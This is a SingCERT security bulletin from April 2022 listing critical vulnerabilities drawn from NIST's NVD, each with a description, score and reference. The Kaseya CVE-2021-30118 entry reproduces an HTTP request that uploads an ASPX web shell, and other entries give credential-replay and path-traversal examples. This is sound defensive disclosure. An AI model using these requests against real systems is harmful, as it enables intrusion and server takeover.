Security Bulletin 6 Apr 2022

Published on 06 Apr 2022

Updated on 06 Apr 2022

SingCERT's Security Bulletin summarises the list of vulnerabilities collated from the National Institute of Standards and Technology (NIST)'s National Vulnerability Database (NVD) in the past week.

The vulnerabilities are tabled based on severity, in accordance to their CVSSv3 base scores:


Critical vulnerabilities with a base score of 9.0 to 10.0
High vulnerabilities with a base score of 7.0 to 8.9
Medium vulnerabilities with a base score of 4.0 to 6.9
Low vulnerabilities with a base score of 0.1 to 3.9
None vulnerabilities with a base score of 0.0

For those vulnerabilities without assigned CVSS scores, please visit NVD for the updated CVSS vulnerability entries.

CRITICAL VULNERABILITIES
CVE Number Description Base Score Reference
CVE-2021-35652 Vulnerability in the Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported versions that are affected are Prior to 11.1.2.4.046 and Prior to 21.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Essbase Administration Services. While the vulnerability is in Essbase Administration Services, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Essbase Administration Services. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). 10 https://nvd.nist.gov/vuln/detail/CVE-2021-35652
CVE-2022-0543 It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution. 10 https://nvd.nist.gov/vuln/detail/CVE-2022-0543
CVE-2021-26622 An remote code execution vulnerability due to SSTI vulnerability and insufficient file name parameter validation was discovered in Genian NAC. Remote attackers are able to execute arbitrary malicious code with SYSTEM privileges on all connected nodes in NAC through this vulnerability. 10 https://nvd.nist.gov/vuln/detail/CVE-2021-26622
CVE-2022-24783 Deno is a runtime for JavaScript and TypeScript. The versions of Deno between release 1.18.0 and 1.20.2 (inclusive) are vulnerable to an attack where a malicious actor controlling the code executed in a Deno runtime could bypass all permission checks and execute arbitrary shell code. This vulnerability does not affect users of Deno Deploy. The vulnerability has been patched in Deno 1.20.3. There is no workaround. All users are recommended to upgrade to 1.20.3 immediately. 10 https://nvd.nist.gov/vuln/detail/CVE-2022-24783
CVE-2021-46433 In fenom 2.12.1 and before, there is a way in fenom/src/Fenom/Template.php function getTemplateCode()to bypass sandbox to execute arbitrary PHP code when disable_native_funcs is true. 10 https://nvd.nist.gov/vuln/detail/CVE-2021-46433
CVE-2021-3589 An authorization flaw was found in Foreman Ansible. An authenticated attacker with certain permissions to create and run Ansible jobs can access hosts through job templates. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 9.9 https://nvd.nist.gov/vuln/detail/CVE-2021-3589
CVE-2016-1453 Buffer overflow in the Overlay Transport Virtualization (OTV) GRE feature in Cisco NX-OS 5.0 through 7.3 on Nexus 7000 and 7700 devices allows remote attackers to execute arbitrary code via long parameters in a packet header, aka Bug ID CSCuy95701. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2016-1453
CVE-2016-9427 Integer overflow vulnerability in bdwgc before 2016-09-27 allows attackers to cause client of bdwgc denial of service (heap buffer overflow crash) and possibly execute arbitrary code via huge allocation. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2016-9427
CVE-2017-5645 In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2017-5645
CVE-2018-18408 A use-after-free was discovered in the tcpbridge binary of Tcpreplay 4.3.0 beta1. The issue gets triggered in the function post_args() at tcpbridge.c, causing a denial of service or possibly unspecified other impact. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2018-18408
CVE-2018-20019 LibVNC before commit a83439b9fbe0f03c48eb94ed05729cb016f8b72f contains multiple heap out-of-bound write vulnerabilities in VNC client code that can result remote code execution 9.8 https://nvd.nist.gov/vuln/detail/CVE-2018-20019
CVE-2019-9641 An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_TIFF. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9641
CVE-2019-0160 Buffer overflow in system firmware for EDK II may allow unauthenticated user to potentially enable escalation of privilege and/or denial of service via network access. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-0160
CVE-2019-6140 A configuration issue has been discovered in Forcepoint Email Security 8.4.x and 8.5.x: the product is left in a vulnerable state if the hybrid registration process is not completed. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-6140
CVE-2019-9788 Mozilla developers and community members reported memory safety bugs present in Firefox 65, Firefox ESR 60.5, and Thunderbird 60.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9788
CVE-2019-9791 The type inference system allows the compilation of functions that can cause type confusions between arbitrary objects when compiled through the IonMonkey just-in-time (JIT) compiler and when the constructor function is entered through on-stack replacement (OSR). This allows for possible arbitrary reading and writing of objects during an exploitable crash. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9791
CVE-2019-9792 The IonMonkey just-in-time (JIT) compiler can leak an internal JS_OPTIMIZED_OUT magic value to the running script during a bailout. This magic value can then be used by JavaScript to achieve memory corruption, which results in a potentially exploitable crash. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9792
CVE-2019-8352 By default, BMC PATROL Agent through 11.3.01 uses a static encryption key for encrypting/decrypting user credentials sent over the network to managed PATROL Agent services. If an attacker were able to capture this network traffic, they could decrypt these credentials and use them to execute code or escalate privileges on the network. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-8352
CVE-2019-16928 Exim 4.92 through 4.92.2 allows remote code execution, a different vulnerability than CVE-2019-15846. There is a heap-based buffer overflow in string_vformat in string.c involving a long EHLO command. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-16928
CVE-2019-17124 Kramer VIAware 2.5.0719.1034 has Incorrect Access Control. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-17124
CVE-2019-17545 GDAL through 3.0.1 has a poolDestroy double free in OGRExpatRealloc in ogr/ogr_expat.cpp when the 10MB threshold is exceeded. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-17545
CVE-2019-16672 An issue was discovered on Weidmueller IE-SW-VL05M 3.6.6 Build 16102415, IE-SW-VL08MT 3.5.2 Build 16102415, and IE-SW-PL10M 3.3.16 Build 16102416 devices. Sensitive Credentials data is transmitted in cleartext. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-16672
CVE-2019-0219 A website running in the InAppBrowser webview on Android could execute arbitrary JavaScript in the main application's webview using a specially crafted gap-iab: URI. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2019-0219
CVE-2020-10108 In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-10108
CVE-2020-10109 In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted as a pipelined request. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-10109
CVE-2020-9760 An issue was discovered in WeeChat before 2.7.1 (0.3.4 to 2.7 are affected). When a new IRC message 005 is received with longer nick prefixes, a buffer overflow and possibly a crash can happen when a new mode is set for a nick. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-9760
CVE-2020-1957 Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-1957
CVE-2020-11651 An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-11651
CVE-2020-8159 There is a vulnerability in actionpack_page-caching gem < v1.2.1 that allows an attacker to write arbitrary files to a web server, potentially resulting in remote code execution if the attacker can write unescaped ERB to a view. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-8159
CVE-2020-9850 A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. A remote attacker may be able to cause arbitrary code execution. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-9850
CVE-2017-18922 It was discovered that websockets.c in LibVNCServer prior to 0.9.12 did not properly decode certain WebSocket frames. A malicious attacker could exploit this by sending specially crafted WebSocket frames to a server, causing a heap-based buffer overflow. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2017-18922
CVE-2020-15851 Lack of access control in Nakivo Backup & Replication Transporter version 9.4.0.r43656 allows remote users to access unencrypted backup repositories and the Nakivo Controller configuration via a network accessible transporter service. It is also possible to create or delete backup repositories. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-15851
CVE-2020-17510 Apache Shiro before 1.7.0, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-17510
CVE-2020-35847 Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-35847
CVE-2020-35848 Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php newpassword function. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-35848
CVE-2021-21783 A code execution vulnerability exists in the WS-Addressing plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-21783
CVE-2020-9493 A deserialization flaw was found in Apache Chainsaw versions prior to 2.1.0 which could lead to malicious code execution. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-9493
CVE-2021-30116 Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp When an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword This Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9) This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered --- * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact --- Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-30116
CVE-2021-30118 An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-30118
CVE-2020-36239 Jira Data Center, Jira Core Data Center, Jira Software Data Center from version 6.3.0 before 8.5.16, from 8.6.0 before 8.13.8, from 8.14.0 before 8.17.0 and Jira Service Management Data Center from version 2.0.2 before 4.5.16, from version 4.6.0 before 4.13.8, and from version 4.14.0 before 4.17.0 exposed a Ehcache RMI network service which attackers, who can connect to the service, on port 40001 and potentially 40011[0][1], could execute arbitrary code of their choice in Jira through deserialization due to a missing authentication vulnerability. While Atlassian strongly suggests restricting access to the Ehcache ports to only Data Center instances, fixed versions of Jira will now require a shared secret in order to allow access to the Ehcache service. [0] In Jira Data Center, Jira Core Data Center, and Jira Software Data Center versions prior to 7.13.1, the Ehcache object port can be randomly allocated. [1] In Jira Service Management Data Center versions prior to 3.16.1, the Ehcache object port can be randomly allocated. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-36239
CVE-2021-3711 In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-3711
CVE-2021-26084 In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-26084
CVE-2021-36260 A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-36260
CVE-2021-38297 Go before 1.16.9 and 1.17.x before 1.17.2 has a Buffer Overflow via large arguments in a function invocation from a WASM module, when GOARCH=wasm GOOS=js is used. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-38297
CVE-2021-3907 OctoRPKI does not escape a URI with a filename containing "..", this allows a repository to create a file, (ex. rsync://example.org/repo/../../etc/cron.daily/evil.roa), which would then be written to disk outside the base cache folder. This could allow for remote code execution on the host machine OctoRPKI is running on. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-3907
CVE-2021-42377 An attacker-controlled pointer free in Busybox's hush applet leads to denial of service and possible code execution when processing a crafted shell command, due to the shell mishandling the &&& string. This may be used for remote code execution under rare conditions of filtered command input. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-42377
CVE-2021-29114 A SQL injection vulnerability in feature services provided by Esri ArcGIS Server 10.9 and below allows a remote, unauthenticated attacker to impact the confidentiality, integrity and availability of targeted services via specifically crafted queries. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-29114
CVE-2021-43882 Microsoft Defender for IoT Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-41365, CVE-2021-42310, CVE-2021-42311, CVE-2021-42313, CVE-2021-42314, CVE-2021-42315, CVE-2021-43889. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-43882
CVE-2022-21724 pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-21724
CVE-2022-0582 Unaligned access in the CSN.1 protocol dissector in Wireshark 3.6.0 to 3.6.1 and 3.4.0 to 3.4.11 allows denial of service via packet injection or crafted capture file 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0582
CVE-2022-23608 PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In versions up to and including 2.11.1 when in a dialog set (or forking) scenario, a hash key shared by multiple UAC dialogs can potentially be prematurely freed when one of the dialogs is destroyed . The issue may cause a dialog set to be registered in the hash table multiple times (with different hash keys) leading to undefined behavior such as dialog list collision which eventually leading to endless loop. A patch is available in commit db3235953baa56d2fb0e276ca510fefca751643f which will be included in the next release. There are no known workarounds for this issue. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23608
CVE-2022-24724 cmark-gfm is GitHub's extended version of the C reference implementation of CommonMark. Prior to versions 0.29.0.gfm.3 and 0.28.3.gfm.21, an integer overflow in cmark-gfm's table row parsing `table.c:row_from_string` may lead to heap memory corruption when parsing tables who's marker rows contain more than UINT16_MAX columns. The impact of this heap corruption ranges from Information Leak to Arbitrary Code Execution depending on how and where `cmark-gfm` is used. If `cmark-gfm` is used for rendering remote user controlled markdown, this vulnerability may lead to Remote Code Execution (RCE) in applications employing affected versions of the `cmark-gfm` library. This vulnerability has been patched in the following cmark-gfm versions 0.29.0.gfm.3 and 0.28.3.gfm.21. A workaround is available. The vulnerability exists in the table markdown extensions of cmark-gfm. Disabling the table extension will prevent this vulnerability from being triggered. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-24724
CVE-2022-0730 Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0730
CVE-2021-42171 Zenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-42171
CVE-2022-25487 Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-25487
CVE-2022-0757 Rapid7 Nexpose versions 6.6.93 and earlier are susceptible to an SQL Injection vulnerability, whereby valid search operators are not defined. This lack of validation can allow a logged-in, authenticated attacker to manipulate the "ANY" and "OR" operators in the SearchCriteria and inject SQL code. This issue was fixed in Rapid7 Nexpose version 6.6.129. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0757
CVE-2020-25176 Some commands used by the Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x eXchange Layer (IXL) protocol perform various file operations in the file system. Since the parameter pointing to the file name is not checked for reserved characters, it is possible for a remote, unauthenticated attacker to traverse an application’s directory, which could lead to remote code execution. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2020-25176
CVE-2022-27250 The UNISOC chipset through 2022-03-15 allows attackers to obtain remote control of a mobile phone, e.g., to obtain sensitive information from text messages or the device's screen, record video of the device's physical environment, or modify data. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27250
CVE-2021-45809 Multiple versions of GlobalProtect-openconnect are affected by incorrect access control in GPService through DBUS, GUI Application. The way GlobalProtect-Openconnect is set up enables arbitrary users to execute commands as root by submitting the `--script=--redacted-- versions of GlobalProtect-openconnect are affected by incorrect access control in GPService through DBUS, GUI Application. The way GlobalProtect-Openconnect is set up enables arbitrary users to execute commands as root by submitting the `--script=<script>` parameter 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-45809
CVE-2021-27426 GE UR IED firmware versions prior to version 8.1x with “Basic” security variant does not allow the disabling of the “Factory Mode,” which is used for servicing the IED by a “Factory” user. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-27426
CVE-2021-27428 GE UR IED firmware versions prior to version 8.1x supports upgrading firmware using UR Setup configuration tool – Enervista UR Setup. This UR Setup tool validates the authenticity and integrity of firmware file before uploading the UR IED. An illegitimate user could upgrade firmware without appropriate privileges. The weakness is assessed, and mitigation is implemented in firmware Version 8.10. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-27428
CVE-2021-27476 A vulnerability exists in the SaveConfigFile function of the RACompare Service, which may allow for OS command injection. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in Rockwell Automation FactoryTalk AssetCentre v10.00 and earlier. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-27476
CVE-2022-22819 NXP LPC55S66JBD64, LPC55S66JBD100, LPC55S66JEV98, LPC55S69JBD64, LPC55S69JBD100, and LPC55S69JEV98 microcontrollers (ROM version 1B) have a buffer overflow in parsing SB2 updates before the signature is verified. This can allow an attacker to achieve non-persistent code execution via a crafted unsigned update. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-22819
CVE-2022-24934 wpsupdater.exe in Kingsoft WPS Office through 11.2.0.10382 allows remote code execution by modifying HKEY_CURRENT_USER in the registry. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-24934
CVE-2021-31326 D-Link DIR-816 A2 1.10 B05 allows unauthenticated attackers to arbitrarily reset the device via a crafted tokenid parameter to /goform/form2Reboot.cgi. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-31326
CVE-2022-27811 GNOME OCRFeeder before 0.8.4 allows OS command injection via shell metacharacters in a PDF or image filename. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27811
CVE-2022-26249 Survey King v0.3.0 does not filter data properly when exporting excel files, allowing attackers to execute arbitrary code or access sensitive information via a CSV injection attack. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26249
CVE-2022-26279 EyouCMS v1.5.5 was discovered to have no access control in the component /data/sqldata. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26279
CVE-2022-22687 Buffer copy without checking size of input ('Classic Buffer Overflow') vulnerability in Authentication functionality in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to execute arbitrary code via unspecified vectors. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-22687
CVE-2022-1040 An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1040
CVE-2021-43090 An XML External Entity (XXE) vulnerability exists in all versions of soa-model (as of 11.01/2021) in the WSDLParser function. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-43090
CVE-2021-43636 Two Buffer Overflow vulnerabilities exists in T10 V2_Firmware V4.1.8cu.5207_B20210320 in the http_request_parse function when processing host data in the HTTP request process. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-43636
CVE-2021-26621 An Buffer Overflow vulnerability leading to remote code execution was discovered in MEX01. Remote attackers can use this vulnerability by using the property that the target program copies parameter values to memory through the strcpy() function. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-26621
CVE-2022-27919 Gradle Enterprise before 2022.1 allows remote code execution if the installation process did not specify an initial configuration file. The configuration allows certain anonymous access to administration and an API. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27919
CVE-2022-22274 A Stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution in the firewall. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-22274
CVE-2022-22995 The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-22995
CVE-2022-26198 Notable v1.8.4 does not filter text editing, allowing attackers to execute arbitrary code via a crafted payload injected into the Title text field. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26198
CVE-2022-26205 Marky commit 3686565726c65756e was discovered to contain a remote code execution (RCE) vulnerability via the Display text fields. This vulnerability allows attackers to execute arbitrary code via injection of a crafted payload. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26205
CVE-2022-26245 Falcon-plus v0.3 was discovered to contain a SQL injection vulnerability via the parameter grpName in /config/service/host.go. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26245
CVE-2021-44127 In DLink DAP-1360 F1 firmware version <=v6.10 in the "webupg" binary, an attacker can use the "file" parameter to execute arbitrary system commands when the parameter is "name=deleteFile" after being authorized. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-44127
CVE-2022-26255 Clash for Windows v0.19.8 was discovered to allow arbitrary code execution via a crafted payload injected into the Proxies name column. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26255
CVE-2022-26258 D-Link DIR-820L 1.05B03 was discovered to contain a remote command execution (RCE) vulnerability via the Device Name parameter in /lan.asp. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26258
CVE-2021-26599 ImpressCMS before 1.4.3 allows include/findusers.php groups SQL Injection. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-26599
CVE-2021-26600 ImpressCMS before 1.4.3 has plugins/preloads/autologin.php type confusion with resultant Authentication Bypass (!= instead of !==). 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-26600
CVE-2022-26268 Xiaohuanxiong v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /app/controller/Books.php. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26268
CVE-2021-44617 A SQL Injection vulnerability exits in the Ramo plugin for GLPI 9.4.6 via the idu parameter in plugins/ramo/ramoapirest.php/getOutdated. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-44617
CVE-2022-26273 EyouCMS v1.5.4 was discovered to lack parameter filtering in \\user\\controller\\shop.php, leading to payment logic vulnerabilities. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26273
CVE-2022-25757 In Apache APISIX before 2.13.0, when decoding JSON with duplicate keys, lua-cjson will choose the last occurred value as the result. By passing a JSON with a duplicate key, the attacker can bypass the body_schema validation in the request-validation plugin. For example, `{"string_payload":"bad","string_payload":"good"}` can be used to hide the "bad" input. Systems satisfy three conditions below are affected by this attack: 1. use body_schema validation in the request-validation plugin 2. upstream application uses a special JSON library that chooses the first occurred value, like jsoniter or gojay 3. upstream application does not validate the input anymore. The fix in APISIX is to re-encode the validated JSON input back into the request body at the side of APISIX. Improper Input Validation vulnerability in __COMPONENT__ of Apache APISIX allows an attacker to __IMPACT__. This issue affects Apache APISIX Apache APISIX version 2.12.1 and prior versions. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-25757
CVE-2022-23882 TuziCMS 2.0.6 is affected by SQL injection in \\App\\Manage\\Controller\\BannerController.class.php. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23882
CVE-2022-0342 An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0342
CVE-2022-23884 Mojang Bedrock Dedicated Server 1.18.2 is affected by an integer overflow leading to a bound check bypass caused by PurchaseReceiptPacket::_read (packet deserializer). 9.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23884
CVE-2021-25070 The Block Bad Bots WordPress plugin before 6.88 does not properly sanitise and escape the User Agent before using it in a SQL statement to record logs, leading to an SQL Injection issue 9.8 https://nvd.nist.gov/vuln/detail/CVE-2021-25070
